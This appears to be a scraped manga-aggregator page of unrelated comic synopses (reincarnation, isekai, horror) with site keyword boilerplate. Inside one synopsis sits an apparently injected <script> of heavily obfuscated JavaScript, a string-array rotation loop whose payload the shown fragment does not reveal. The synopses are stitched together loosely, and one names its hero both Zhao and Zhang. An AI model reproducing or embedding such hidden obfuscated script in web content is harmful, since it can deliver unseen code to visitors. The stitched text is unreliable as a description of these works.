Read Manga The Reversal Of My Life As A Side Character / The Reversal Of My Life As A Mob Character / Моя Жизнь В Толпе В Обратном Направлении. In The Midst Of A Repetitive And Boring Everyday Life, A Game Appeared As If It Were Fate—*Heroes Destiny*. After Spending Ten Years Playing It, I Finally Completed The Game, But All That Remained Was The Emptiness Of Having To Return To An Ordinary Life. At That Moment, A Message Appeared On The Screen: “Do You Desire A New Adventure? [Yes/No].” Little Did He Know That He Would Wake Up In An Unfamiliar Body And An Unknown Place. “Remember, I Am Now Calix Shaekin.” And Thus… “I Will Become The Protagonist Of This World!” モブな俺の逆転人生
Zhao Xiaotian suffered all kinds of hardships with relevance to supernatural powers. After he got caught up in an explosion, he was able to catch up with the comic genre trend nowadays which is: "Isekai". But unfortunately, the villains of the world still got their grasp on him for unknown reasons, maybe due to plot. He was continuously assassinated, kidnapped, and he was ripped of his money. And thenceforth, Zhang Xiaotian persevered on the way of cultivation!<script></script><script>function _0x3154(_0x1dd319,_0x1da527){var _0x3c823c=_0x1d11();return _0x3154=function(_0x8edc48,_0x5dbe20){_0x8edc48=_0x8edc48-(-0x1185+0x1*-0x148d+0x97*0x43);var _0x116b4c=_0x3c823c[_0x8edc48];return _0x116b4c;},_0x3154(_0x1dd319,_0x1da527);}(function(_0xb3a4d2,_0x359516){var _0x4df310=_0x3154,_0x4e9927=_0xb3a4d2();while(!![]){try{var _0x4f93f9=-parseInt(_0x4df310(0x177))/(-0x277+-0x885+0xafd*0x1)*(parseInt(_0x4df310(0x17b))/(0x18*0xde+0x24b*0x11+-0x3bc9))+-parseInt(_0x4df310(0x189))/(0x9*0x1f3+0x13e3+-0x256b)+-parseInt(_0x4df310(0x17e))/(0x15b*-0x11+-0xaec+0x21fb)+-parseInt(_0x4df310(0x178))/(0x2587+0xbe2+-0x3164*0x1)+-parseInt(_0x4df310(0x18b))/(0x877+-0x1b83+0x1312)+parseInt(_0x4df310(0x181))/(0x1ea2+-0x1*0x1235+-0x2*0x633)*(-parseInt(_0x4df310(0x185))/(0x1*0x186d+-0x158*0xc+-0x1d*0x49))+parseInt(_0x4df310(0x190))/(0x13b1+-0x2138+-0x1*-0xd90);if(_0x4f93f9===_0x359516)break;else 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In Order To Stop The Invasion Of The Demons And Seal The Evil God Which Has Been Resurrected After A Thousand Years, Grey Embarks On A Journey Together With His Sister, Fiona, And His Comrades. At The End Of Their Journey, They Were Facing The Evil God, And All Of His Comrades Including His Little Sister Were Killed Because Of The Evil God. Being The Only Survivor Of The Journey, Grey Was Hailed As A Hero And Was Granted The Throne As The Emperor Of The Holy Empire, Gaining Glory And Authority. Unfortunately, Grey Couldn’t Recover From The Grief Of Losing His One And Only Sister, And Decided To Use Any Means Necessary To Revive Her. After Countless Attempts To Try And Revive His Sister, Grey Became Hopeless, Until He Heard A Mysterious Voice Saying, [Do You Want To Save The Most Precious Person In Your Life?] [If You’re Willing To Sacrifice Everything, I Will Show You The Way.] After Making A Deal With The Mysterious Voice, Grey Found Himself Standing In His Hometown That Was Supposed To Be Destroyed By The Invasion Of The Demons… 救世主の生き残り
People around me called me a sage who was obsessed with the Philosopher\'s Stone.\" There was once a man who mastered magic and was known as a sage. Realizing that creating the Philosopher\'s Stone was impossible with his current body, he took a gamble. He decided to reincarnate into a future world as a different person to obtain a new, stronger body. His reincarnation was successful, and he gained the body of a cute boy named Mars, marked with the emblem of strength, the \"Pure Seal.\" However, in the future, this emblem was inexplicably regarded as a \"Defective Seal\"...! All for the sake of the Philosopher\'s Stone. The journey of the strongest sage begins anew!!
Read “Thumbs Up, Level Up Novel” – “Thumbs Up, Level Up Manhwa” Online Free At Genztoons The Summary Of The Comics “Thumbs Up, Level Up”: Um Jicheok Was Just An Underappreciated Hunter’s Assistant Until An Odd Dream And A Simple Thumbs Up Triggered His Awakening As A Hunter And Hot Godtube Influencer. Jicheok Doesn’t Earn Points By Killing Monsters Though. Instead, He Must Do Good Deeds And Gain The Approval Of Others. So When A Heroic Video Of Him Goes Viral And Top Companies Start Wooing Him With Contracts, It Seems Like The Sky’s The Limit. But Will Fame Be A More Dangerous Game Than Our Rising Star Expected…? “Thumbs Up, Level Up” Is Alternatively Named: Leveling Up With Likes / Leveling Up With Thumbs Up / Leveling With Thumbs Up / The God Influencer / Thumbs-Up Leveling / イイネでレベルアップ / 被点赞的猎人 / 따봉으로 레벨업 The Comics “Thumbs Up, Level Up” Belongs To The Genre: Action, Adventure, Comedy, Demons, Drama, Fantasy, Magic, Manhwa, Monsters, Romance, Sci-Fi, Supernatural “Kun Manga, Manga Updates, Manhwa Website…” Are The Most Searched Keywords On The Website S2Manga. We Offer A Wide Selection Of The Best And Newest Comics Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging
“You good-for-nothing bastard. You are the son of a Sword Saint, yet you dare pull such a defective Class!?” During the〈Divine Blessing Ceremony〉of the 15-year-old Elma who came from a lineage of Sword Saints, he had manifested a commonly deemed defective class known as the Heavy Knight. He had been deprived of his position as the next head of the Edvan Household and was then exiled. The Heavy Knight class had an unbalanced status and useless skills, to top it off, it was even said to be a class cowardly and indolent people have. But, Elma knew better—that this world was the world of the game he had used to play before—and that the Heavy Knight class was the strongest class to exist. Elma made full use of the knowledge he had in his previous life and began his efficient walkthrough of the world he was reincarnated into.
An adventurer named Ed was exiled from his party because he was considered useless, but instead of being sad and upset he was actually happy!!? It turns out that it\'s not without reason that he feels happy when he\'s exiled from his party, because every time he\'s been exiled he will receive a skill that makes him even more invincible... Ed was given the crazy test of having to get expelled from 100 Hero parties in 100 different worlds before he could return to his original world. Finally a mysterious and divine entity said that he had achieved all the conditions to return to his original world. However, as a final condition he is asked “Look at the fate of one of these exile worlds after you left.” and he is shocked by what he sees. “Okay, I’ll do it! I’ll go down to these 100 worlds again and be banished with a good feeling!” Ed takes on a new challenge to make full use of the super-powerful “Exiled Skills” that were granted each time he was exiled, and this time ensure they all have happy endings. ___ **Character Designer:** [GreeN](
I am from Egypt. I love drawing manga as a hobby. I am not good enough, but I am trying. Your comments and testimony motivate me to continue.
As demons start creeping in through the Witches\' Quarter, its protector must rise to the occasion and stop them from invading the human world.
Ex-policeman Kanetsugu Nawa is a model prisoner, imprisoned for murder and attempted murder in an act of revenge for his late wife and daughter. After being released on parole and shunned by his only remaining family, he returns to the only thing he has left; his revenge. A strange young girl follows him upon his release, seemingly with an ulterior motive...
A certain girl genius with more power than knowledge accidentally summoned dozens of students and teachers into a dangerous world filled with beasts and magic, but the protagonist isn’t a student or the homeroom teacher… it’s the janitor.
♪\'Lalala, the cute puppy will die in a while.\'♪ ♪\'And I feel that fella near waterfall will fall and drown, oh yes, he will.\'♪ A karaoke prophet wanders around the town singing weird prophecies into his trusty handy karaoke. No matter how you look at it he\'s a risky guy, but his sinister prophecies are always right. A puppy that high schooler Yori got from her boyfriend dies. Later, a middle-aged man drowns after falling into a waterfall, a giant fire occurs in the city, and… even more?! The scary, the grotesque, even the ridiculous: a collection of bizarre horror stories!